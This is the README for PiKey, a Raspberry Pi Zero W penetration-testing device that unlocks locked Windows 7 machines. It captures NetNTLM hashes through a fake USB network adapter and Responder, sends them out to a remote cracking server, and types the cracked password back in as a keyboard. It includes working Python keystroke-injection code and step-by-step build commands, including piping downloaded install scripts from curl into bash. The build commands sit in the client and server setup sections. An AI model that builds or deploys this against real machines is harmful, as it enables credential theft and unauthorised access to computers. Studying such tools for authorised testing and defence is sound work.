PiKey is a Physical Penetration Testing device used for the extraction and reuse of credentials on locked Microsoft Windows 7 systems. It is designed to work against corporate domain-joined machines, but may also work against home machines.
Based on the Raspberry Pi Zero W, the PiKey builds upon the credential-stealing attacks published by Mubix in 2016 (https://room362.com/post/2016/snagging-creds-from-locked-machines/) and goes one step further by using the stolen credentials to unlock the machine. It typically takes one to three minutes to unlock a machine.
The PiKey is due to be demonstrated at the BSidesLondon 2017 conference; a video of it in action can be found below.
When first inserted into a machine, the PiKey emulates a known USB network adaptor (so all Windows 7 machines should load drivers for it without needing to download anything from Windows Update). Windows then prioritises this new interface over any pre-existing ones and starts sending traffic through it, even while the machine is locked. This allows the device to run the excellent Responder against that traffic and capture credentials (NetNTLM hashes).
Once credentials have been obtained, the PiKey sends them to a remote server, which performs password cracking against them. If a credential is cracked, the cleartext password is sent back to the PiKey.
The PiKey then stops emulating the network adaptor and starts emulating an HID keyboard. The cleartext credentials are typed into the locked machine, unlocking it.
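What the final step looks like at the byte level, as an added example that is not PiKey's own code: a Linux USB gadget configured as a keyboard exposes a device such as /dev/hidg0, and every keystroke written to it is an 8-byte boot-protocol report (modifier byte, reserved byte, up to six key usage IDs), followed by an all-zero report to release the key. The character table assumes a US keyboard layout on the target (a target with a different layout would receive the wrong symbols, so check this before an engagement); the device path and the sample password are assumptions.

```python
"""Encode a cleartext password as USB HID keyboard reports and write them to a
HID gadget device. Added example, not PiKey's own code; US layout assumed."""
import os

# USB HID usage IDs (Keyboard/Keypad page) for unshifted US-layout characters.
_PLAIN = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
_PLAIN.update({c: 0x1E + i for i, c in enumerate("123456789")})
_PLAIN.update({"0": 0x27, "\n": 0x28, "\t": 0x2B, " ": 0x2C, "-": 0x2D, "=": 0x2E,
               "[": 0x2F, "]": 0x30, "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35,
               ",": 0x36, ".": 0x37, "/": 0x38})
# Characters typed with Left Shift held: same usage ID as the unshifted key.
_SHIFTED = {s: _PLAIN[p] for s, p in zip('!@#$%^&*()_+{}|:"~<>?',
                                          "1234567890-=[]\\;'`,./")}
_SHIFTED.update({c.upper(): _PLAIN[c] for c in "abcdefghijklmnopqrstuvwxyz"})

LEFT_SHIFT = 0x02      # bit 1 of the modifier byte
RELEASE = bytes(8)     # all keys up; sent after every key so repeated letters register


def report(ch):
    """8-byte boot-protocol report [modifiers, reserved, key1..key6] for one character."""
    if ch in _PLAIN:
        return bytes([0x00, 0x00, _PLAIN[ch], 0, 0, 0, 0, 0])
    if ch in _SHIFTED:
        return bytes([LEFT_SHIFT, 0x00, _SHIFTED[ch], 0, 0, 0, 0, 0])
    raise ValueError(f"no US-layout key for {ch!r}")


def reports_for(text):
    """Key-down / key-up report pairs that type `text`; a trailing "\\n" submits the logon."""
    out = []
    for ch in text:
        out.append(report(ch))
        out.append(RELEASE)
    return out


def type_into_host(text, device="/dev/hidg0"):
    """Write the reports to the HID gadget device (assumed path). Returns the number
    of reports sent, or 0 when no gadget is present, e.g. when run off the Pi."""
    if not os.path.exists(device):
        return 0
    sent = 0
    with open(device, "wb", buffering=0) as hid:
        for r in reports_for(text):
            hid.write(r)
            sent += 1
    return sent


if __name__ == "__main__":
    # Constructed sample credential; the newline presses Enter on the lock screen.
    print(type_into_host("Spring2017!\n") or "no /dev/hidg0 on this machine")
```

The release report after every key matters: without it the host sees one long key press, and a password such as "aa" arrives as a single "a".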
The following hardware is required for the PiKey to work
The following software is required for the PiKey to work
Once the PiKey and Kali Linux have been set up correctly, the following process is used to run the PiKey:
Setup of the PiKey is broken into two stages: the client (PiKey device) and the server (Kali Linux). Complete the client setup first and the server setup second, because the SSH key pair used for secure communication is created on the PiKey and its public key must then be pasted into the server setup script.
Download the latest version of Jessie Lite (https://downloads.raspberrypi.org/raspbian_lite_latest)
Follow the guidance here for step by step installation (https://www.raspberrypi.org/documentation/installation/installing-images/README.md) …but in short:
Plug the MicroSD card into your Pi Zero. It also makes sense at this point to plug in a monitor and a keyboard. Apply some power and wait for it to boot.
Login with username: pi and password: raspberry
Now is a good time to connect to your Wi-Fi so you can download the rest of the prerequisites. Steps for connecting to Wi-Fi, for the non-Linux-savvy among us, are below.
Edit the network interfaces file:
sudo nano /etc/network/interfaces
Find the entry for wlan0 and modify it to match the text below. If there is no wlan0 entry, add the following to the bottom of the file, then press Ctrl+X to save and exit:
allow-hotplug wlan0
iface wlan0 inet dhcp
    wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
    metric 10
Edit the wpa_supplicant file:
sudo nano /etc/wpa_supplicant/wpa_supplicant.conf
Add the following block to the bottom of the file (with your own network name and key), then press Ctrl+X to save and exit:
network={
    ssid="your network name"
    psk="your network key"
    key_mgmt=WPA-PSK
}
At this point you can do the following to verify that it connects to your Wi-Fi OK:
sudo ifdown wlan0
sudo ifup wlan0
!!NOTE!! - After the initial install, it might be wise to change these settings to a Wi-Fi hotspot on your phone or similar, as this is typically what you will use away from home. If you forget this step, then no hashes will get cracked!!
Configure SSH to start on boot:
sudo touch /boot/ssh
Reboot (with the screen connected as this will print the DHCP IP address for the wireless adapter). Log back in via SSH.
Run the setup script as the non-root user (pi):
bash <(curl -s https://raw.githubusercontent.com/SecurityJon/PiKey/master/client/install.sh)
When the script prints the public key, do not reboot the device until the Server has been built, as you will need to paste this key into the server setup script.
Get a copy of Kali Linux up and running, with internet connectivity and TCP port 22 forwarded to it from the internet.
Make a note of the URL/IP address of the internet-facing side of the device.
Run the setup script as root (or as a user with sudo permissions):
bash <(curl -s https://raw.githubusercontent.com/SecurityJon/PiKey/master/server/install.sh)
All hashes captured by the Server can be seen with the following command:
cat /home/pikeyuser/PiKey/PiKey_CapturedHashes.txt
During the setup process the PiKey creates a public/private key pair. The private key is always kept on the PiKey and the public key is copied into the server setup script. All credentials passed between the PiKey and the Server travel over an SSH connection between the two components, which is authenticated by those keys.
Within the Server setup script a line is inserted into the authorized_keys file for the PiKey user which forces a single command, so that nothing can be run on the server with that key apart from password cracking of the passed credentials.
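The two halves of that restriction, as an added example rather than the project's own server script: authorized_keys_entry() builds the key line with a forced command and the sshd options that deny a shell, pty and forwarding; filter_hashes() and allowed_request() are what the forced command runs, ignoring whatever the client asked sshd to execute (which sshd passes in SSH_ORIGINAL_COMMAND) and accepting only lines shaped like NetNTLMv1/v2 captures on stdin. The account name and the hash file path come from this README; the wrapper path, the "upload-hashes" request string and the sample hash lines are assumptions.

```python
"""Forced-command wrapper and authorized_keys builder for a single-purpose SSH key.
Added example, not PiKey's own code."""
import os
import re
import sys

HASH_FILE = "/home/pikeyuser/PiKey/PiKey_CapturedHashes.txt"  # file named in the README
WRAPPER = "/home/pikeyuser/PiKey/receive_hashes.py"            # assumed path of this script

# sshd options that make the key single-purpose: the client gets no shell, no pty
# and no port/agent/X11 forwarding, regardless of what it requests.
RESTRICTIONS = "no-pty,no-port-forwarding,no-X11-forwarding,no-agent-forwarding"


def authorized_keys_entry(pubkey, wrapper=WRAPPER):
    """Line to append to ~pikeyuser/.ssh/authorized_keys for the PiKey's public key."""
    pubkey = pubkey.strip()
    if not pubkey.startswith(("ssh-ed25519 ", "ssh-rsa ", "ecdsa-sha2-")):
        raise ValueError("not an OpenSSH public key line")
    return f'command="{wrapper}",{RESTRICTIONS} {pubkey}'


# Text forms Responder writes and hashcat reads:
#   NetNTLMv2: user::DOMAIN:serverchallenge(16 hex):NTProofStr(32 hex):blob(hex)
#   NetNTLMv1: user::DOMAIN:LMresponse(48 hex):NTresponse(48 hex):challenge(16 hex)
NETNTLMV2 = re.compile(r"^[^:\s]+::[^:\s]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$")
NETNTLMV1 = re.compile(r"^[^:\s]+::[^:\s]*:[0-9a-fA-F]{48}:[0-9a-fA-F]{48}:[0-9a-fA-F]{16}$")


def filter_hashes(lines):
    """Split input into (accepted, rejected). Only lines shaped like captured hashes
    are accepted; commands, paths and blank lines are dropped, so a stolen or
    misused PiKey key can feed the cracker but cannot make the server do anything else."""
    accepted, rejected = [], []
    for raw in lines:
        line = raw.strip()
        if line and (NETNTLMV2.match(line) or NETNTLMV1.match(line)):
            accepted.append(line)
        else:
            rejected.append(line)
    return accepted, rejected


def allowed_request(original_command):
    """The only thing the PiKey may ask for is the upload (assumed request name);
    an interactive shell, scp, or any other command is refused."""
    return original_command in (None, "", "upload-hashes")


def main():
    if not allowed_request(os.environ.get("SSH_ORIGINAL_COMMAND")):
        print("refused", file=sys.stderr)
        return 1
    accepted, rejected = filter_hashes(sys.stdin)
    with open(HASH_FILE, "a") as out:
        for h in accepted:
            out.write(h + "\n")
    print(f"stored {len(accepted)}, rejected {len(rejected)}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

On the PiKey side the upload is then `ssh pikeyuser@server upload-hashes < captured.txt`; if someone with the PiKey's private key tries `ssh pikeyuser@server bash` instead, sshd still runs only the wrapper, which sees "bash" in SSH_ORIGINAL_COMMAND and refuses.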
The PiKey itself doesn't store any obtained or cracked credentials, so if it is lost or taken the credentials won't be exposed. The Server, however, stores all of the credentials passed to it, so even if they're not cracked during an engagement they can be attacked again at a later date; treat the Server as holding client data and protect and wipe it accordingly.
PiKey Created by Jon Aubrey (@SecurityJon) and Trevor Shingles (@_tshingles), 2017
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
Thanks to the following individuals for help on this project:
Mark Stone for the great name
James Parish for the initial PiKey logo